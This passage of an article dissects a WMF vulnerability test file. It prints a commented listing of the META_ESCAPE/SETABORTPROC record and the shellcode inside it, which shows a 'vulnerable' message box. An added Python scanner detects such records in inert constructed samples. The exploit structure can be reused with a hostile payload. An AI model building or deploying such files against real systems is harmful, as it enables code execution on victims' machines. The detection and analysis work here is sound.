Metaphysics of wmf files

       

structure of frame records


The last record always has the form 0003h 0000h 0000h (header size: 03h words, function NULL, no parameters), which is interpreted as "end of metafile".

Now let's have a smoke and start disassembling exploit.wmf, which contains a lot of bytes, but all of them quite simple. In short, its commented listing is given below:

WindowsMetaHeader:                ; # standard metafile header
FileType      dw     1            ; file type (0 - memory, 1 - disk)
                                  ; the PlayMetaFile API function ignores this value,
                                  ; but most viewers such as Irfan Viewer require FileType == 1
HeaderSize    dw     9            ; header size in words (always 09h)
Version       dw     300h         ; required Windows version (01h | 03h)
FileSize      dd     0EDh         ; file size in words
                                  ; ignored by PlayMetaFile, IrfanViewer requires the correct value
NumOfObjects  dw     6            ; number of objects (can be anything)
MaxRecordSize dd     3Dh          ; size of the largest record (can be anything)
NumOfParams   dw     0            ; number of parameters (can be anything)

StandardMetaRecord:               ; # META_ESCAPE frame record carrying the shellcode
Size          dd     11h          ; record size in words, SMR included (> 00h)
Function      db     26h          ; function number - META_ESCAPE (see WINGDI.H)
num_of_arg    db     6            ; number of arguments (can be anything)
subfunct      dw     9            ; subfunction - SETABORTPROC (see WINGDI.H)
hDC           dw     16h          ; SETABORTPROC parameter - hDC (ignored)

shell_code    proc near
              call   $+5          ; \_ EBP := EIP  determine the current EIP
              pop    ebp          ; /  EBP := EIP
              call   GetKrnl32addr ; determine the base address of KERNEL32.DLL
              mov    ebx, eax     ; ebx := eax := base address of KERNEL32.DLL

              ; check the f_silent_mode flag
              ; if (f_silent_mode == 0) MessageBox(); else Exit();
              mov    ecx, (offset f_silent_mode-21h)
              add    ecx, ebp
              mov    ecx, [ecx]
              test   ecx, ecx
              jnz    short exit   ; --> f_silent_mode != 0, goto Exit()

              ; determine the address of the LoadLibraryA API function
              mov    ecx, (offset aLoadlibrarya-21h) ; "LoadLibraryA"
              add    ecx, ebp     ; ^ "LoadLibraryA"
              push   ecx          ; -> &"LoadLibraryA"
              push   ebx          ; -> base of KERNEL32.DLL
              call   GetProcAddr  ; eax <= &LoadLibraryA()

              ; load the USER32.DLL library
              mov    ecx, (offset aUser32_dll-21h) ; "user32.dll"
              add    ecx, ebp     ; ^ "user32.dll"
              push   ecx          ; -> &"user32.dll"
              call   eax          ; call LoadLibraryA("user32.dll")

              ; determine the address of the MessageBoxA API function
              mov    ecx, (offset aMessageboxa-21h) ; "MessageBoxA"
              add    ecx, ebp     ; ^ "MessageBoxA"
              push   ecx          ; -> &"MessageBoxA"
              push   eax          ; -> base of USER32.DLL
              call   GetProcAddr  ; eax <= &MessageBoxA()

              ; call MessageBoxA and display the greeting on screen
              push   0            ; uType
              push   0            ; lpCaption
              mov    ecx, (offset aYourSystemIsVu-21h) ; "Your system is vulnerable"
              add    ecx, ebp     ; ^ "Your system is vulnerable"
              push   ecx          ; lpText
              push   0            ; hWnd
              call   eax          ; call MessageBox

exit:         ; terminate the current host process          ; CODE XREF: shell_code+18j
              mov    ecx, (offset aExitprocess-21h) ; "ExitProcess"
              add    ecx, ebp     ; ^ "ExitProcess"
              push   ecx          ; -> &"ExitProcess"
              push   ebx          ; -> base of KERNEL32.DLL
              call   GetProcAddr  ; eax <= &ExitProcess()
              push   1            ; uExitCode
              call   eax          ; call ExitProcess(1);
shell_code    endp

aMessageboxa    db   'MessageBoxA',0               ; DATA XREF: shell_code+32o
aExitprocess    db   'ExitProcess',0               ; DATA XREF: shell_code:exito
aLoadlibrarya   db   'LoadLibraryA',0              ; DATA XREF: shell_code+1Ao
aUser32_dll     db   'user32.dll',0                ; DATA XREF: shell_code+28o
aYourSystemIsVu db   'Your system is vulnerable',0Ah ; DATA XREF: shell_code+44o
                db   'Please visit http://www.hexblog.com and install the hotfix!',0
aWmfVulnerabili db   ' WMF Vulnerability test file by Ilfak Guilfanov',0

f_silent_mode   dd   0                             ; DATA XREF: shell_code+Do

; closing frame record
; (required by the specification, but optional in practice)
EndingMetaRecord:
Size          dw     3
Function      dw     0
Parameters    dw     0
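As an added example (my own code, not part of the article and not Ilfak Guilfanov's test file), here is a Python walker over the header and frame records laid out in the listing, written from the defender's side: it flags META_ESCAPE records whose subfunction word is SETABORTPROC, the record that carries the payload here. It goes slightly beyond the page in two ways: it skips the 22-byte Aldus placeable header (magic 9AC6CDD7h, which the listing's file does not have), and it refuses records whose Size field would make a naive walker stand still or read past the end of the file. The sample files are constructed inline with inert filler in place of code; META_SETMAPMODE (0103h) and the MFCOMMENT escape (subfunction 15) appear only as benign sample records.

```python
import struct

# Constants taken from the listing: META_ESCAPE is stored as function byte 26h
# followed by an argument-count byte (6 in the listing), i.e. the WORD 0626h;
# SETABORTPROC is escape subfunction 9.
META_ESCAPE = 0x0626
SETABORTPROC = 9
MFCOMMENT = 15                # benign escape subfunction, used only in the constructed sample
META_SETMAPMODE = 0x0103      # benign drawing record, used only in the constructed sample
PLACEABLE_KEY = 0x9AC6CDD7    # Aldus placeable-header magic (assumption: not in the listing)


def parse_wmf_records(data: bytes):
    """Walk a WMF file and return a list of (offset, function_word, params) tuples.

    Layout follows the listing: an 18-byte (09h-word) header, then records of the
    form {Size dd, Function dw, params...}. Stops at the 0003h 0000h 0000h end
    record when present (the text notes it is optional in practice).
    """
    off = 0
    if len(data) >= 4 and struct.unpack_from('<I', data, 0)[0] == PLACEABLE_KEY:
        off = 22  # skip the 22-byte placeable header that precedes the standard one
    if len(data) < off + 18:
        raise ValueError('truncated metafile header')
    (file_type, header_size, version, file_size,
     num_objects, max_record, num_params) = struct.unpack_from('<HHHIHIH', data, off)
    if header_size != 9:
        raise ValueError(f'unexpected HeaderSize {header_size:#x}, expected 9 words')
    off += header_size * 2
    records = []
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from('<IH', data, off)
        if size_words < 3:
            # Size counts the 6-byte record header itself; anything smaller would
            # make the walker stand still or go backwards.
            raise ValueError(f'record at {off:#x} has impossible Size {size_words}')
        end = off + size_words * 2
        if end > len(data):
            raise ValueError(f'record at {off:#x} overruns the file')
        records.append((off, func, data[off + 6:end]))
        if func == 0:      # Function NULL: end of metafile
            break
        off = end
    return records


def find_setabortproc(data: bytes):
    """Return offsets of META_ESCAPE records whose subfunction is SETABORTPROC."""
    hits = []
    for off, func, params in parse_wmf_records(data):
        # Compare only the low byte: per the listing the high byte (argument count)
        # "can be anything".
        if (func & 0xFF) == (META_ESCAPE & 0xFF) and len(params) >= 2:
            if struct.unpack_from('<H', params, 0)[0] == SETABORTPROC:
                hits.append(off)
    return hits


# --- constructed sample files (not the article's exploit.wmf) ---------------
def record(func: int, params: bytes) -> bytes:
    """Build one frame record; Size is in words and includes the 6-byte record header."""
    return struct.pack('<IH', (6 + len(params)) // 2, func) + params


def build_wmf(records) -> bytes:
    """Prepend a standard 18-byte header (FileType 1, HeaderSize 9, Version 300h)."""
    body = b''.join(records)
    header = struct.pack('<HHHIHIH', 1, 9, 0x300, 9 + len(body) // 2, 0,
                         max(len(r) // 2 for r in records), 0)
    return header + body


END_RECORD = record(0, b'')   # bytes 03 00 00 00 00 00, i.e. 0003h 0000h 0000h
INERT_DATA = b'X' * 0x16      # constructed filler standing in for the 16h-byte data area

SUSPECT_WMF = build_wmf([
    record(META_ESCAPE, struct.pack('<HH', SETABORTPROC, len(INERT_DATA)) + INERT_DATA),
    END_RECORD,
])
BENIGN_WMF = build_wmf([
    record(META_SETMAPMODE, struct.pack('<H', 1)),
    record(META_ESCAPE, struct.pack('<HH', MFCOMMENT, 4) + b'note'),
    END_RECORD,
])
# Same suspect file behind a placeable header (checksum left at 0; not verified here).
PLACEABLE_SUSPECT_WMF = (struct.pack('<IHhhhhHIH', PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0)
                         + SUSPECT_WMF)

if __name__ == '__main__':
    for name, blob in [('suspect', SUSPECT_WMF), ('benign', BENIGN_WMF),
                       ('placeable', PLACEABLE_SUSPECT_WMF)]:
        print(name, 'SETABORTPROC escapes at:', [hex(o) for o in find_setabortproc(blob)])
```

Matching on the low function byte alone is deliberate: the high byte is the argument count, which the listing says can be anything, so a detector keyed on the full WORD 0626h would miss trivially varied files. The Size guards matter in a scanner because a hostile file can set Size to 0 or to a value past the end of the data, and a walker that trusts it either spins or reads out of bounds.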

